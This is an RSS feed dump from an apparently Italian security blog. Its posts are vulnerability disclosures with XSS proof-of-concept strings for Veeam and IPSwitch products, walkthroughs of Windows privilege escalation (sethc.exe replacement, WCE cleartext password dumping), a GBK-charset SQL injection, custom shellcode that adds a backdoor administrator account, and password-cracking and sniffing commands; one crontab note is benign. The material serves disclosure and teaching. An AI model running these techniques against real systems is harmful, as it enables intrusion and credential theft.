GoSecure! https://www.gosecure.it/blog MyDear(root)Shell Mon, 09 Jul 2018 13:47:34 +0000 en-US hourly 1 https://wordpress.org/?v=5.6 Public Disclosure – Palo Alto Networks https://www.gosecure.it/blog/art/620/public-disclosure/public-disclosure-palo-alto-networks/ Sun, 08 Jul 2018 19:39:13 +0000 https://www.gosecure.it/blog/?p=620 Thank you Palo Alto Networks!

https://securityadvisories.paloaltonetworks.com/

]]>
Full Disclosure – Veeam Backup Enterprise Manager Service v9 https://www.gosecure.it/blog/art/572/public-disclosure/full-disclosure-veeam-backup-enterprise-manager-service-v9/ https://www.gosecure.it/blog/art/572/public-disclosure/full-disclosure-veeam-backup-enterprise-manager-service-v9/#respond Fri, 25 Mar 2016 17:56:09 +0000 https://www.gosecure.it/blog/?p=572 read more)]]> Vendor: Veeam
Product: Veeam Backup Enterprise Manager Service v9.0.0.902
Type of vulnerability: Multiple, persistent Cross Site Scripting
CVSS: 4.1 (AV:A/AC:L/Au:S/C:P/I:P/A:N)
CVE: requested
Exploit-DB
OSVDB:

Discovered by: GoSecure!
Date of discovery: 16 september 2016
First contact with vendor: 18  september 2016 – Case Id: 01702458
Patching date: 24 march 2016
Full Disclosure: 25 march 2016

Details:
A cross site scripting web vulnerability has been discovered in Veeam Backup Enterprise Manager Service v9.0.0.902.
Authenticated users are able to inject own malicious Java Script codes in order to spoof session of other users of the affected web-application.

The issues are located in:
1 – Configuration > Search Server > Add > “DNS name” field – reflected XSS
2 – Configuration > Backup Server > Add > “Server description” field – stored XSS
3 – Jobs > “Description” field – stored XSS injected via remote backup server

The security risk of the client-side web vulnerability is estimated as medium with a Overall CVSS (common vulnerability scoring system) Score 4.1 .The attackers can spoof session or emulate every action that the victim can do in the web application.

Proof of Concept (PoC):
The cross site scripting web vulnerability can be exploited by authenticated user that may want to make a privilege escalation or impersonate another user of the web-application. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

1 – Configuration > Search Server > Add > “DNS name” field – reflected XSS
Attacker injection and activation:
– Go to Configuration > Search Server
– click on Add button
– insert the following string in the “DNS name or IP …” field and click ok
<iframe width="300" height="150">
– the script is activated

2 – Configuration > Backup Server > Add > “Server description” field – stored XSS
Attacker injection and activation:
– Go to Configuration > Backup Server
– click on Add button
– add a server and insert the follow string in the “Server description” field
<iframe onload=alert('GoSecure!')>
– point the mouse over the description of the new server: the script is activated

Otherwise edit the description of an existing server

3 – Jobs > “Description” field – stored XSS injected via remote backup server
Attacker injection:
– Go in a “Veeam Backup an Replication Server” that is managed by the “Veeam Backup Enterprise Manager Server”
– In “Home” > “Managed server” click on a job (eg. File Copy)
– Create e new job and insert the following description:§
<iframe onload=alert('Peru GoSecure!')></iframe>
– Complete the creation of the job and click finish.

Victim activation:
– Go in the Enterprise Manager web interface
– In Jobs, point the mouse over the description of the new job: the script is activated.

Note that, although this third issue is not unauthenticated, the problem can be that an evil user can create Job in a remote Backup server and inject code in another server/app in order to get e session in the Enterprise Manager Server
The JS injected, using POSTDATA as payload, can do every thing the victim can do in the web interface of the Enterprise Manager Server

Remediation:
https://www.veeam.com/kb2114

]]>
https://www.gosecure.it/blog/art/572/public-disclosure/full-disclosure-veeam-backup-enterprise-manager-service-v9/feed/ 0
Barracuda Hall of Fame https://www.gosecure.it/blog/art/551/public-disclosure/barracuda-hall-of-fame/ https://www.gosecure.it/blog/art/551/public-disclosure/barracuda-hall-of-fame/#respond Fri, 05 Dec 2014 10:23:45 +0000 https://www.gosecure.it/blog/?p=551 Thank you Barracuda 😀

Barracuda
https://barracudalabs.com/research-resources/bug-bounty-program/bug-bounty-hall-of-fame-2/

 

]]>
https://www.gosecure.it/blog/art/551/public-disclosure/barracuda-hall-of-fame/feed/ 0
Privilege escalation using Windows Credential Editor https://www.gosecure.it/blog/art/539/sec/privilege-escalation-using-windows-credential-editor/ https://www.gosecure.it/blog/art/539/sec/privilege-escalation-using-windows-credential-editor/#respond Fri, 27 Jun 2014 16:28:19 +0000 https://www.gosecure.it/blog/?p=539 read more)]]> As I wrote in this article is often trivial to become local admin on MS system if there isn’t a strong and clear security policy, but it’s also the same in a Unix environment.
What is the next step? If an attacker becomes local admin of a company’s PC the next step is to become a more powerfull administrator; so, if the PC is joined to a Domain, the objective will be to become a Domain Admin in order to completly compromise the whole network.
Here’s a tool that can be used to reach this scope in particular conditions: Windows Credentials Editor (WCE v1.3 beta)
It’s quite simple to use:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>wce.exe -h
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.
Options:
        -l              List logon sessions and NTLM credentials (default).
        -s              Changes NTLM credentials of current logon session.
                        Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
        -r              Lists logon sessions and NTLM credentials indefinitely.
                        Refreshes every 5 seconds if new sessions are found.
                        Optional: -r<refresh interval>.
        -c              Run <cmd> in a new session with the specified NTLM credentials.
                        Parameters: <cmd>.
        -e              Lists logon sessions NTLM credentials indefinitely.
                        Refreshes every time a logon event occurs.
        -o              saves all output to a file.
                        Parameters: <filename>.
        -i              Specify LUID instead of use current logon session.
                        Parameters: <luid>.
        -d              Delete NTLM credentials from logon session.
                        Parameters: <luid>.
        -a              Use Addresses.
                        Parameters: <addresses>
        -f              Force 'safe mode'.
        -g              Generate LM & NT Hash.
                        Parameters: <password>.
        -K              Dump Kerberos tickets to file (unix & 'windows wce' format)
        -k              Read Kerberos tickets from file and insert into Windows cache
        -w              Dump cleartext passwords stored by the digest authentication package
        -v              verbose output.

Let’s try to run WCE using the -w option. Note that you must be a priveliged user to run this tool.

C:\Documents and Settings\Administrator>wce.exe -w
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.

Administrator\CLI01:Pa$$w0rdZ

C:\Documents and Settings\Administrator>

It’s pretty simple: WCE shows every passwords cached; in clear text.
Let’s assume that the pc CLI01 is joined to a domain and let’s see what happen if some service is started using domain admin password:

C:\Documents and Settings\Administrator>wce.exe -w
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.

Administrator\mydomain.local:MyPaZZw0rd_IsW3ry$tronG
Administrator\CLI01:Pa$$w0rdZ

WOW! The domain admin password stored locally is showed.

How many service are misconfigured in your network? Let’s hope very few because you are a very good sysadmin and no service starts with domain sensitive password, but what about social engeneering?
Each time a user is begging for a password for an installation or he asks to you something that leads to digit your admin password on his pc, is it a legittimate request or does he wants your password cached?
So, you domain admin, what kind of password do you use on company users pc? The domain-admin-super-God password or the local pc password?

Basing ourselves on this and the previous post let’s now compile an hypothetical roadmap from simple user to domain admin:
1- Boot the company Microsoft PC using a CD/DVD with a bootable operating System
2- Use the sethc “feature” to become local admin
3- Begging for a domain admin password (“Please I need the latest java update, but I need your password”, “I’m trying to add a new charset, but the pc is asking for an admin password…”)
4- Run WCE and become domain admin
5- Use some other tool like pstool and collect the password of every user of the network

I think that these are the defences that a network/system admin can adopt:
1- No external device boot allowed and PC and case locked
2- No remediation on this (may be some domain policy). Remember that also Linux has a level 1 booting.
3- Users are invasive and dangerous, even if they don’t want your password. So Always log on their PCs always with the lowest privileges you can.
4- WCE must blocked to users (AV rule, policy, firewall)
5- If an attacker reach this point you will probably spend the next weeks searching another job in another city

The scope of this post is to make system admininistrators and everyone else aware on how to take care about IT security.
Many times, working as sysadmin, we make mistakes, we are pressured and we sometimes left open ports saying “I will patch them later”, but we always have to remember what risks we are taking.
An attack, talking about computer and network, often starts from the bottom and, little by little, try to reach the top; a small door open gives the way for another gate an so on. This process is called Privilege Escalation.

]]>
https://www.gosecure.it/blog/art/539/sec/privilege-escalation-using-windows-credential-editor/feed/ 0
Full Disclosure – IPSwitch IMail Server WEB client vulnerability https://www.gosecure.it/blog/art/510/public-disclosure/full-disclosure-ipswitch-imail-server-web-client-vulnerability/ https://www.gosecure.it/blog/art/510/public-disclosure/full-disclosure-ipswitch-imail-server-web-client-vulnerability/#respond Tue, 03 Jun 2014 13:22:07 +0000 https://www.gosecure.it/blog/?p=510 read more)]]> Vendor: IPSwitch
Product: IMail Server WEB client. Tested on 12.3 and 12.4 before 12.4.1.15
Type of vulnerability: Persistent Cross Site Scripting
CVSS: 3.4 – Vector
CVE: 2014-3878
Exploit-DB 33633
OSVDB: 107700 107701 107702

Discovered by: GoSecure!
Date of discovery: 30 march 2014
First contact with vendor: 31 march 2014 – Case Id: 2-199617
Patching date: 19 may 2014
Full Disclosure: 3 june 2014

Four injection points were useful to create a persistent Cross Site Scripting. All the injections are reached using default Web Client interface, but the Web Client Lite seems to be not vulnerable to these tests.

1. Contacts section:
A persistent XSS can be reached adding a new contact with a specific string in the Name field and whatever image:

PoC string:
Go<iframe width="300" height="150"></iframe>Secure!

IPSwitch1

When the contact is saved and on mouse over the picture the Name is been displayed in a bubble activating the JS:

IPSwitch2

2. Contacts section:
A vulnerability can also be reached in the Adding Group task.

PoC string:
<iframe src="https://www.gosecure.it" width="500" height="500" frameborder="1" align="center"></iframe>

IPSwitch3

3. Calendar section:
A persistent XSS can be reached adding a new event in the Calendar; this event can be spread adding the Meeting Request option.
Since, using this injection point, the XSS can be spread to other users, this is the most dangerous of the four and can be used to spoofing sessions and therefore compromising the attacked users account

The JavaScript is executed simply viewing the calendar or when the Reminder pops up.

PoC string:
GS!<iframe width="300" height="150"></iframe>

IPSwitch4
IPSwitch5

4.Task section:
In a similar way also the tasks are vulnerable to persistent XXS.

PoC string:
<iframe src="https://www.gosecure.it/blog/remote/xss_h.html" width="300" height="150">IPSwitch6

]]>
https://www.gosecure.it/blog/art/510/public-disclosure/full-disclosure-ipswitch-imail-server-web-client-vulnerability/feed/ 0
Sethc: Access to every PC and become local Admin https://www.gosecure.it/blog/art/500/sec/sethc-access-to-every-pc-and-become-local-admin/ https://www.gosecure.it/blog/art/500/sec/sethc-access-to-every-pc-and-become-local-admin/#respond Wed, 21 May 2014 22:14:47 +0000 https://www.gosecure.it/blog/?p=500 read more)]]> This article talk about to connetting to a pc when you don’t have password and:
– you have physical access to the pc
– you can boot from a CD/usb/other HD

This is an old method that I rediscovered after many years and, with big surprise, is still present on modern MS operating systems (win 7 and 8).
At the base of this “feature” I’m going to describe there is a windows executable: c:\windows\system32\sethc.exe (but it’s not the only way: you can also use shutdown.exe).

If you have a Windows system you can activate this program by pressing 5 times the left SHIFT, this operation runs the executable (sethc.exe).

There are two problems if you analyze this situation: first it can be runned also in the login screen before authentication, second the privilege used to run the executable is SYSTEM (in the login screen no user is already logged in)
This is quite terrible.
Before, in XP sp2 and early xp sp3, this file was used to escalate privilege whitout phisycal access to the pc: the file was accessible by everyone and was not locked by the system, so a user could remove the legittimate sethc.exe, copy the cmd.exe from the same folder and rename it in sethc.exe.

What was the window that poped-up when the user hits CTRL for 5 times after this alteration? A CMD shell! What was the privilege of this shell? System!
Luckily Microsoft patched this problem in late XP sp3 and now the file is locked and can’t be manipulated when the Operating System is started, but the setch.exe is still there.

Some weeks ago I had some problems to access a windows laptop (win 7 SP1). Although I had the authorization to access to it I didn’t have the password to enter and no options to recover it. so I tried this:
I put a linux bootable CD and boot the pc using it. Then I simply mounted the windows file system and used some command like this:

[root@localhost /]#  mkdir -p /media/c
[root@localhost /]#  mount -t ntfs /dev/hd02 /media/c
[root@localhost /]#  cd /media/c/Windows/System32
[root@localhost /]#  cp sethc.exe _sethc.exe
[root@localhost /]#  cp cmd.exe sethc.exe

Than I rebooted the system from HD and, when in the login screen, I simply pressed 5 times the left SHIFT.Ta-da! I got a SYSTEM shell.
I used a basic command line to create a new user and put it in Administrators group and, less than 5 minutes later, I had the full graphic control of the box.

This caused me a hundred of ideas, so, put aside this latop, I went on with my tests.
I tried it over a Win8 box, on a domain PC and against a server with strong domain policy and every time it worked fine.

So this is my assume (but you can refute):
If you have physical access and if you can boot from an external device (using bios or physically adding a new HD to the pc case) you can log into a Windows pc using SYSTEM privilege.

That’s why in every Company, that believe in IT security, the external device booting, the PXE, and the access to the PC case must be regulated.

ASAP I will write some example to become Domain admin strarting from this point, to highlight how dangerous is every litle door that a sys admin leaves open.

]]>
https://www.gosecure.it/blog/art/500/sec/sethc-access-to-every-pc-and-become-local-admin/feed/ 0
Mysql_escape_string: the charset vulnerability https://www.gosecure.it/blog/art/483/sec/mysql_escape_string-the-charset-vulnerability/ https://www.gosecure.it/blog/art/483/sec/mysql_escape_string-the-charset-vulnerability/#comments Wed, 16 Apr 2014 11:16:13 +0000 https://www.gosecure.it/blog/?p=483 read more)]]> The mysql_escape_string is a deprecated and vulnerable PHP function used to sanitize the user input before it reaches the mysql query.
It escapes most of special character that can be used by a malicious user to perform SQLi.

This is an exampre of how the function works:

root@bt:~# cat /tmp/esc_str.php
<?
        function escape_str($s)
        {
                $mystr = mysql_escape_string($s);
                echo "mystr is: " . $mystr . "\n";
        }
         escape_str(" ' \ ; A B ! % ");
?>

root@bt:~# php /tmp/esc_str.php
mystr is:  \' \\ ; A B ! %

In spite of this, as you can see, some sensible chars aren’t escaped like the % that can be useful in a LIKE query.

The mysql_escape_string have some vulnerability partially patched with the mysql_real_escape_string.
Particularly mysql_escape_string don’t require authentication and can be insert before the mysql_connect function.
This means that it doesn’t verify the database character encoding, but analyzes and sanitizes the string one byte at time also if the batabase encoding is multi bytes (GBK, UTF-8, Big5).

Take a look at this example of mysql authentication using PHP code:

function mysqllogin(){
   $db_name  = "db0001";
   $tbl_name = "tb0023";
   $user = mysql_escape_string($_POST["login_user"]);
   $pswd = mysql_escape_string($_POST["login_pswd"]);
   mysql_connect("127.0.0.1", "root", "toor")or die("No MYSQL connection");
   mysql_query("SET CHARACTER SET 'gbk'");
   mysql_select_db("$db_name")or die("No DB connection");
   $sql = "SELECT COUNT(*) FROM tb0023 WHERE user='$user' and pswd='$pswd'";
   $rsql = mysql_query($sql) or die(mysql_error());
   $rw = mysql_fetch_row($rsql);
   if ($rw[0]) {bf
      return 1;
   } else {
      return 0;
   }

If we suppose that the db encoding is GBK (in this case I forced it in the PHP code: mysql_query("SET CHARACTER SET 'gbk'")) we can try to take advantage of the use of different encoding type.
First of all let’s try to use PHP to see difference between GBK and ASCII, before and after mysql_escape_string()
Use the follow php sample:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ascii">
<title>PERU.local</title>
</head>

<body style="font-family:Verdana;color:#9bbbcb;">
<div style="text-align:center">

<div style="text-align:center;color:#ff0000;">
=========================================================<br>
This is a php page with ASCII charset<br>
---------------------------------------------------------<br>
The string passed to mysql_escape_string is \xBF\x27<br>
The output of mysql_escape_string is \xBF\x5c\x27<br>
<br>
=========================================================<br>
</div>
<div align="center">
<table style="margin-top:50px;">
<tr>
<td style="text-align:right">
<?
$lol =  "\xbf\x27";
$lol2 = mysql_escape_string($lol);
?>
<strong>--------</strong>
</td>
<br><br>
<? echo "This is the string before mysql_escape_string: " . $lol ; ?><br>
<? echo " --- "; ?><br>
<? echo "This is the string after mysql_escape_string: " . $lol2; ?><br>
<td style="text-align:left">
</table>
</div>
</form>
</div>
</body>
</html>
ascii

Image 1

Now modify the previous sample and load it:

...
<meta http-equiv="content-type" content="text/html; charset=gbk">
...

gbk

Image 1


As you can see in image 2 the escape (\) char is no longer displayed, this because the mysql_escape_string output is \xbf\x5c\x27
This output is encoded by ASCII (a single character charset) as “\xbf” (an inverted question mark), “\x5c” (\ the escape char) and “\x27” (‘ a single quote).
On the other side (gbk – multibytes) the output is encoded in “\xbf\x5c” (a kanji) and \x27 (‘ a single quote).

Ok, the string that reaches the MySQL will be \xbf\x5c\x27; now, if the charset on MySQL is GBK, the behaviour will be the same of the PHP page: a kanji and a single quote that is what we need for a SQLi.
In the image 3 you can see actually the result:

sqli

Image 3

The only encoding I found to be vulnerable are GBK and BIG5 because are the only that have \x5c as second byte of an allowed character.
But you can explore more by referring to this site.
Also I can’t find a way to force the DB chatset before MySQL connection, so I suppose that SQLi can be reached only if the GBK is already the BD charset.

You can try to read the following posts to get more info about mysrl_real_escape and this kind of vulnerability:
https://security.stackexchange.com/questions/8028/does-mysql-escape-string-have-any-security-vulnerabilities-if-all-tables-using-l
https://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
https://stackoverflow.com/questions/5741187/sql-injection-that-gets-around-mysql-real-escape-string
https://stackoverflow.com/questions/3665572/mysql-escape-string-vs-mysql-real-escape-string
https://www.sans.org/reading-room/whitepapers/application/web-application-injection-vulnerabilities-web-app-039-s-security-nemesis-34247

]]>
https://www.gosecure.it/blog/art/483/sec/mysql_escape_string-the-charset-vulnerability/feed/ 3
Create a custom shellcode using System() function https://www.gosecure.it/blog/art/452/sec/create-a-custom-shellcode-using-system-function/ https://www.gosecure.it/blog/art/452/sec/create-a-custom-shellcode-using-system-function/#comments Mon, 20 Jan 2014 16:40:15 +0000 https://www.gosecure.it/blog/?p=452 read more)]]> Recently I have to write a custom shellcode that accommodate some specific features. Basically I have to avoid the use of some functions like WinExec() and ShellExecute() to create a remote code execution and insert it as payload in a test exploit.
I have to search some other function that allow me to execute command on a remote PC and I found it in the System() call function. I’m not a skilled developer, so what described below is my working solution, maybe not the better solution.

I’m not talking here about the exploit, but only about the shellcode creation and choices motivations. This exemple can be easly fit to other situations and replicated without inserting it in an exploit, but simply tested in a developer or in a custom binary file.

I started from this sample code. It uses the Windows API function MessageBoxA to popup a message

[BITS 32]

mov ebx, 0x00584148 ; Loads a null-terminated string “HAX” to ebx
push ebx ; pushes ebx to the stack
mov esi, esp ; saves null-terminated string “HAX” in esi
xor eax, eax ; Zero our eax (eax=0)
push eax ; Push the fourth parameter (uType) to the stack (value 0)
push esi ; Push the third parameter (lpCaption) to the stack (value HAX\00)
push esi ; Push the second parameter (lpText) to the stack (value HAX\00)
push eax ; Push the first parameter (hWnd) to the stack (value 0)
mov eax, 0x7E45058A ; Move the MessageBoxA address in to eax
call eax ; Call the MessageBoxA function with all parameters supplied.

Looking up the MessageBoxA function in Google reveals four arguments:

int MessageBox(
  HWND hWnd,
  LPCTSTR lpText,
  LPCTSTR lpCaption,
  UINT uType
  );

So the sample code pushes in the stack all the arguments and then call the address of the function already loaded in memory.

Some things to underline:
– at the end of every argument a null byte is insered (\x00)
– the arguments are pushed in reverse order into the stack (LIFO)
– this is only a shellcode and it has to be appended to a program; this program must have the function MessageBoxA (user32.dll) loaded in memory.
– the address of the function (0x7E45058A) is hadrcoded and works only on the Operating System the shellcode is written for.
– the hardcoded address doesn’t work in random space address context (ASLR or EMET)

Starting from this sample I want to use the System() function to pass commands to the interpreter (typically CMD.EXE); I search in MSDN specifications and I found that it needs only one parameter: the command I want to pass.

system(
  "echo A>%tmp%\xx.txt"
  );

First I have to determinate, using the debugger, if the function is loaded in memory, so in Olly I search for “Names in all modules” and, luckly I found it in the msvcrt.dll (Figure 1) at address 0x77BF93C7 (Figure 2).

Figure 1

Figure 1


Figure 2

Figure 2


Ok, now I have to convert the string “echo A>%tmp%\xx.txt” in hex, cut it in groups of 4 bytes and invert the order of the groups; also I have to remember to insert the NULL byte at the end of the hex string. These groups will be insered in the stack using the push command and then will group it adding a pointer to the stack.

root@bt:~# echo -ne 'echo A>%tmp%\xx.txt\x00' | xxd -ps | fold -w8 | tac
74787400
5c78782e
746d7025
20413e25
6563686f

So the testing shell code will be like this:

[BITS 32]

PUSH 0x74787400 ; push into the stack, in reverse order, the command 'echo A>%tmp%\xx.txt' adding a NULL byte
PUSH 0x5c78782e
PUSH 0x746d7025
PUSH 0x20413e25
PUSH 0x6563686f
MOV EDI,ESP ; adding a pointer to the stack
PUSH EDI
MOV EAX,0x77BF93C7 ; calling the System() function using the hardcoded address (XP SP3)
CALL EAX

Ok, now I have the test shellcode; I can do it directly in Olly. I open the debugger, attach a program, edit the first few lines, put a brake point at the end of my code and run the program (Figure 3).
Remember that the msvcrt.dll must be one of the module loaded by the program attached to the debugger.

Figure 3

Figure 3


Once the shellcode is ended I verify its work: I go to %tmp% folder and search for the xx.txt file, if all is ok I can insert a better command like net user test Pa$$word1234 /add & net localgroup administrators test /add & net localgroup "Remote desktop users" test /add

Note that the net user/net localgroup need the admin privilege to be executed, so in a real exploit the target program must be started using elevated rights. On the other hand the first command, the echo one, will work also with low privilege.

]]>
https://www.gosecure.it/blog/art/452/sec/create-a-custom-shellcode-using-system-function/feed/ 3
Use Crontab to schedule tasks on Linux https://www.gosecure.it/blog/art/438/note/use-contrab-to-schedule-tasks-on-linux/ https://www.gosecure.it/blog/art/438/note/use-contrab-to-schedule-tasks-on-linux/#respond Fri, 20 Dec 2013 17:26:01 +0000 https://www.gosecure.it/blog/?p=438 read more)]]> You can use Crontab to schedule the execution of tasks. The command crontab -l list all the scripts already scheduled on your machine and the option -e runs the editing mode.
The basic format string looks like this:

A B C D E /bin/do_something.sh

Where
A = minutes (0-59)
B = hours (0-23)
C = day (1-31)
D = month (1-12)
E = week day (0-6 where 0 is Sunday)

The following are examples for:
– Execute /bin/do_something.sh at 9:40 PM from monday to wednesday
– Execute the script every 15 minute and every day
– Execute the script every 21st and 44th minute on every hour and every day, but only in December

40 21 * * 1-3 /bin/do_something.sh
*\15 * * * * /bin/do_something.sh  
21,44 * * 12 * /bin/do_something.sh

Other interesting options:
@reboot = Run once, at startup
@yearly = Run once a year. Like “0 0 1 1 *”
@annually (same as @yearly)
@monthly = Run once a month. Like “0 0 1 * *”
@weekly = Run once a week. Like “0 0 * * 0”
@daily = Run once a day. Like “0 0 * * *”
@midnight (same as @daily)
@hourly = Run once every hour. Like “0 * * * *”

This execute /bin/do_something.sh once, at startup:

@reboot /bin/do_something.sh

How can you manipulate the output?

By default the output is sending to the user (root) mailbox, but it can be redirected.
This Add a row to the file do_something.log inserting output and errors:

@weekly /bin/do_something.sh >> /var/log/do_something.log 2>&1

Send a mail to me@mydomain.com:

* 1,2,3 * * * /bin/script 2>&1 | mail -s "Cronjob ouput" me@mydomain.com:

Trash all output:

@daily /bin/script > /dev/null 2>&1
]]>
https://www.gosecure.it/blog/art/438/note/use-contrab-to-schedule-tasks-on-linux/feed/ 0
The Password Attacks on Kali Linux. [Part 2] https://www.gosecure.it/blog/art/425/sec/the-password-attacks-on-kali-linux-part-2/ https://www.gosecure.it/blog/art/425/sec/the-password-attacks-on-kali-linux-part-2/#respond Wed, 06 Nov 2013 12:55:12 +0000 https://www.gosecure.it/blog/?p=425 read more)]]> This is a part of my article “The Password Attacks on Kali Linux” published on PenTest Magazine.
I have the right to do up to 100 downloads of that magazines, so If you are interested on it you can download PenTest Extra 04_2013 for free using the following link. The only thing you need is a free registration.
PenTest Extra 4_2013

The Password Attacks on Kali Linux [Part 2]

Offline Password attack
The service that use as authentication a keyword needs to store it somewhere and somehow. Think about /etc/shadow or SAM in Windows, but also browsers, routers, switches and any kind of client (ftp, e-mail, smb). The password can be stored in clear text, in databases or hashed in files; every time you copy these files and then you try, even in other environment, to extract the passwords you are doing an offline password attack. With administrative rights is possible, for example, to dump password hash from Windows and Linux system. The same operation can be done mounting the target system disk on the Kali system, also without credentials, or starting the system to attack using a bootable Kali distribution.
Files that contain hashed or plaintext passwords can be found in every place: sometimes the database backup is directly hosted in a web folder, let alone files named password.txt that can be found directly using Google; also htaccess and htpasswd can be dumped sometimes. FTP client, zip files, RDP connection files are a mine of keywords easy to collect too. Sniffing traffic waiting for a pop3/ snmp clear-text request or taking a 4 way handshake from an access point are just other options you have to perform an offline attack.
Remember that keys are often reused throughout the network, so a complex password simply sniffed with Wireshark in a not encrypted packet like pop3 (see Figure 1) can be the same unbreakable and encrypted 15-chars password used for ssh service.

A sample of packet sniffing using Wireshark

Figure 1

Windows SAM file and Linux shadow
Windows stores the hash of local passwords in a file named SAM “Security Accounts Manager” present in c:\windows\system32\config\. Of course the file isn’t plain text, but it has to be merged to another file (SYSTEM) present in the same folder. The union of these two files leads to a readable one where you can see the passwords hash just like thise in Figure 2.
These two files can be accessed only when the operating system is down or using tolls like PWdump or FGdump. The other choice is to dump the system backup of these; in fact, up to Windows Vista, you can find them in c:\windows\repair\ folder. To merge the SAM and the SYSTEM file you can use bkhive and samdump2; after getting the hash, John the Ripper is used to extract the password.

root@kali:~# bkhive /mnt/ntfs/Windows/System32/ config/SYSTEM /tmp/bootkey
root@kali:~# samdump2 /mnt/ntfs/Windows/System32/ config/SAM /tmp/bootkey > /tmp/win_hash.txt
root@kali:~# john /tmp/win_hash.txt

As said previousely, if you own the target machine, you can take advantage of tools like FGdump too or, if you have established a meterpreter session, of the hashdump command (see Figure 2).

The hashes extracted using hashdump command in Metasploit

Figure 2

Note that you need to be Admin or System to launch these commands and you have to upload to the target machine some lines of code that sometimes can be blocked by antivirus.
Since it’s one of the “most wanted” tools, let’s see also JtR in action:

root@kali:~# john /tmp/win_hash.txt
Loaded 15 password hashes
NINAANI (nina:1)
(peru)
PASSWOR (Administrator:1)
PASSW0R (user:1)
AAAAAAA (jasmine:1)
N (nina:2)
D (user:2)
D (Administrator:2)
COS (nick:2)
A1 (jasmine:2)
DE (albert:2)
CR3T (joy:2)
CYBERDU (albert:1)

Note that most passwords are immediately decrypted (nina, administrator, user, jasmine, albert, peru) when others only in part.
This is caused by the old windows method to store password called LM. This kind of hashing, putted next to the newer NTLMv2, is present by default up to Vista to guarantee the backward compatibility. LM can be disabled and Microsoft recommended that, but de facto this is a vulnerability that users are carrying on for many years.
The LM hash works as follow:
• the user password is converted in an all upper case string;
• the password is cutted after 14 bytes (max password length);
• the password is splitted in 2 pieces of 7 bytes max;
• this two pieces are encoded using DES.
This is a simple view of what is LM, but your interest is that JtR has the task to crack an hash with no more than 7 chars-upper-case. This is really different from finding a key with 14 chars, upper and lower case. in addition to this DES kind of encrypting is well known and john use this to speed up the work.

Also, Linux stores keys in two files: /etc/passwd and /etc/shadow. In this case it’s not essential the merge of the two files, but it’s better for decrypting. You can use the JtR command unshadow to join the two.
In Kali Linux you will be able to call any tool from anywhere on the system as every application is included in the system path so you can call unshadow and john just like this:

root@kali:~# unshadow /etc/passwd /etc/shadow > psw_file

Then you use john to decrypt:

root@kali:~# john psw_file

Sometimes you can try to use john on /etc/shadow without unshadowing it, but in this case john will not use the GECOS info (complete name, telephone number…) that helps to perform a better crack. Also the use of some features like -shells will be lost if you don’t perform the unshadow.

Some small words about using Google as hash cracker.
Google is a big container of everything. It’s not unusual to take an encrypted string, paste it in the browser and find the key.
One of the easiest hash to find is the MD5 one. The Message Digest algorithm 5 is an old method of hashing; it is already obsolete and insecure, but users and programs still employ it to encode passwords. If you try to paste an MD5 string in Google you’ll likely find it. Before trying everything else paste the hash in the search engine or use some online rainbowtable program.

The cache and the sniffing
Although the cache and the packet analysis are not pure offline password attacks, they deserve to be mentioned. If you finally own a PC in the net you have to test, squeeze it. Extract all what you are able to take.
First start a sniffing session using Wireshark or, if you can’t, use Ettercap to perform a man in the middle and wait for unencrypted password. These are some normalized output of Ettercap. The first is the capture of a webmail account on an insecure http page instead of more secure https:

root@kali:~# ettercap -T | grep password
webmail_username=nina&webmail_password=ThisIsMyPAZZWORd HTTP/1.1 302 Found.

Then some capture of POP3 and FTP packets:

root@kali:~# ettercap -T | grep PASS
PASS $$up3rPasW0rsS3creT.
FTP : 192.168.34.140:21 -> USER: adminftp  PASS: $$up3rPasW0rsS3creT
PASS jaK3T0ftP.
FTP : 192.168.34.140:21 -> USER: Jake  PASS: jaK3T0ftP
PASS #pa$SW0rd>>ma1L2013!.
POP : 192.168.34.140:110 -> USER: albert  PASS: #pa$SW0rd>>ma1L2013!
PASS AAAAaaaa1.
POP : 192.168.34.140:110 -> USER: jasmine  PASS: AAAAaaaa1

This is why is always better to use an ssl version of all protocols, also in internal communications.

If you have access to a PC search for client’s programs like FileZilla or browsers and take note of passwords archived using meterpreter or search in Internet where the client stores it:

msf  post(filezilla_client_cred) > exploit

[*] Parsing recentservers.xml
[*]  Collected the following credentials:
[*]  Server: 192.168.34.131:21
[*]  Protocol: FTP
[*]  Username: nina
[*]  Password: ninaanin

[*]  Collected the following credentials:
[*]  Server: 217.115.1.1:21
[*]  Protocol: FTP
[*]  Username: joy
[*]  Password: $$ecr3t12

[*]  Collected the following credentials:
[*]  Server: 217.115.1.2:21
[*]  Protocol: FTP
[*]  Username: admin
[*]  Password: FTPCr3dz1209

[*] Post module execution completed

Then use ms-cache option of JtR or program like Windows Credentials Editor that locate system cached password: if you are lucky a sysadmin has been logged or some service is misconfigured and the password is stored (not encoded) in the cache.
In the following case of study the user HP\Nina, present in Domain Administrators group, is simply logged on. In this machine is present an agent misconfigured that use HP\administrator credential to work:

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Documents and Settings\nina>wce.exe -w
WCE v1.3beta (Windows Credentials Editor)
   by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

HP-SRV01$\HP:<contains-non-printable-chars>
nina\HP:ninaanin
Administrator\HP:password
C:\Documents and Settings\nina>

Note that cache keys “ninaanin” and “password” are not encoded.

SMB pass-the-hash
Like in the previous example, not always you’ll have to spend time in decrypting operations. Sometimes you can use the hash you get as it is. Ok, you can’t take the string and just paste it in a authentication window request and login using Remote Desktop, but there is a quite controversial feature in Windows on the authentication management of shared folders.

Consider this example:
Computer A has a c:\share and Computer B tries to connect to that share. B sends its credential in hash format (“hello! I am Administrator and my password is e52cac67419a9a224a3b108f3fa6cb6d”) and A verify if it has this credential, if so it connects Computer B to the share. If not it prompts for username and password.
All this process is in clear text!
